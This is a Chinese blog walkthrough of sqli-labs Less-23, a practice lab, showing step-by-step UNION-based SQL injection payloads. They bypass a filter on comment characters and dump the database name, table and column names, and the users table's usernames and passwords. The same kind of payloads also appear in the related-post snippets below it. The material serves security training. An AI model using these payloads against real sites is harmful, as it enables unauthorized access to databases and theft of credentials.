(手工)【sqli-labs23】联合查询+报错回显

最新推荐文章于 2023-05-08 22:12:27 发布
最新推荐文章于 2023-05-08 22:12:27 发布
阅读量351 收藏 1
点赞数 3
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125722358
版权

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less23(GET-Error based - strip comments)

2.1、简介:(GET注入-过滤注释)

2.2、第一步:注入点测试

 2.3、第二步:分析过滤

2.4、第三步:判断字段数

2.5、第四步:暴库

2.6、第五步:爆表名

2.7、第六步:爆字段

2.8、第七步:爆数据

推荐:

【SQL注入】联合查询(最简单的注入方法)icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125551764?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165752637916782246458034%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165752637916782246458034&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125551764-null-null.185^v2^control&utm_term=%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2&spm=1018.2226.3001.4450【SQL注入-可回显】报错注入:简介、相关函数、利用方法icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165752643116781683967253%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165752643116781683967253&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185^v2^control&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450

 

一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析过滤

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

二、Less23(GET-Error based - strip comments)

2.1、简介:(GET注入-过滤注释)

请求方法:GET

方法:报错回显+联合查询

2.2、第一步:注入点测试

使用' " ) 寻找注入点

是单引号闭合

 

 2.3、第二步:分析过滤

 使用#注释后面单引号,仍报错 

 使用--+注释后面单引号,仍报错 

可以想到--+和#都已经被过滤了

接下来考虑不注释掉后面的语句

对语句进行拼接,前后各加上一个单引号闭合前后

并使用联合查询,拼接语句

 

2.4、第三步:判断字段数

?id=-1' union select 1, 2, 3 '

正常回显

 

?id=-1' union select 1, 2, 3,4 '

报错

 所以字段数为3

2.5、第四步:暴库

?id=-1' union select 1,2,database() '

 或者

?id=-1' union select 1,database(),3 or '1'='1

 

2.6、第五步:爆表名

id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

或者

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

 

2.7、第六步:爆字段

 ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' '

或者

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

 

2.8、第七步:爆数据

?id=-1' union select 1,(select group_concat(concat_ws('-',id,username,password)) from users),3 or '1'='1

 

黑色地带(崛起)
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
SQL注入(一)联合查询 注入
m0_63306943的博客
04-21 1739
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
MySQL注入之回显
震山的博客
09-07 253
利用回显来获取重要信息
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1124
sqli-labs,sql注入
sql-labs靶场第23-53新手通关学习详解
m0_70483044的博客
11-10 1181
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有误的地方欢迎指正!菜鸟选手。
sqlilabs23-65
阿刁〇的博客
07-25 281
文章目录SQL-labs 23—Less-23(基于过滤的GET注入)Less-24(二次注入) SQL-labs 23— Less-23(基于过滤的GET注入) 输入?id=1 回显正常 ?id=1' 回显误 ?id=1' and 1=1# 回显误 查看源代码 ​ 发现对注释符等进行了过滤,只能采用单引号闭合的方法绕过 输入?id=1' and '1'='1 构造语句,获取数据库 id=-1' union select 1,database(),3 or '1'='1 或
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
SQL注入——联合查询注入
18年3月萌新白帽子
06-11 6130
1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询注入中sql里 0x3a表示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...
解决Mapper.xml联合查询
米奇罗
09-05 938
前言 使用 myBatis 在自定义查询语句时,使用联合查询出现问题解决。 org.springframework.dao.DataIntegrityViolationException: ### Error querying database. Cause: java.sql.SQLIntegrityConstraintViolationException: Column 'roo...
mysql联合查询用order_Mysql联合查询UNION和Order by同时使用问题的解决办法
weixin_29023079的博客
01-19 329
因此,常常出现这样的误复制代码 代码如下:select * from [IND] where INDID>10unionselect * from [IND] where INDID<9目前为止,还没有出现问之后,也许有人会用到类似的查询复制代码 代码如下:select * from [IND] where INDID>10 order by INDID descunionse...
SQL注入之联合查询注入和sqlmap
Loners_fan的博客
01-03 4034
SQL注入
SQL注入之联合查询注入
qq_45076423的博客
11-11 837
联合查询 联合查询就是利用SQL 语句union select 。 union select 会把两条SQL 语句的查询结果拼接起来,形成一张虚拟的表。联合查询会实现跨库跨表查询,会极大减少SQL 注入的成本。 联合查询有两个限制条件 两条SQL 语句的查询结果具有相同的列数 两条SQL 语句相同位置的列具有相同的数据类型 联合查询通常用在数据库的内容会回显到网页上的情况,所以联合查询通...
mysql联查 Illegal mix of collations
记录一些工作日常和学习
03-23 757
mysql联查 Illegal mix of collations
基于Sqli-Labs靶场的SQL注入-23~24关
Joker
01-04 1194
重点讲二次注入
sqli-labs通关(二十三)
qq_65950075的博客
05-08 448
这一关是get类型当输入?id=1'时,出现信息,是由单引号闭合的但是输入?id=1'--+的时候,还是,说明我们的注释符可能被过滤处理了查看码源,确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli-labs回显数据库
09-13
很抱歉,我不能提供任何关于 SQL 注入实验室(sqli-labs)中回显数据库的具体方法。SQL 注入是一种违法行为,违反了计算机安全和隐私法律规定。我鼓励合法的计算机安全实践,并不能支持或提供任何与非法活动相关的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值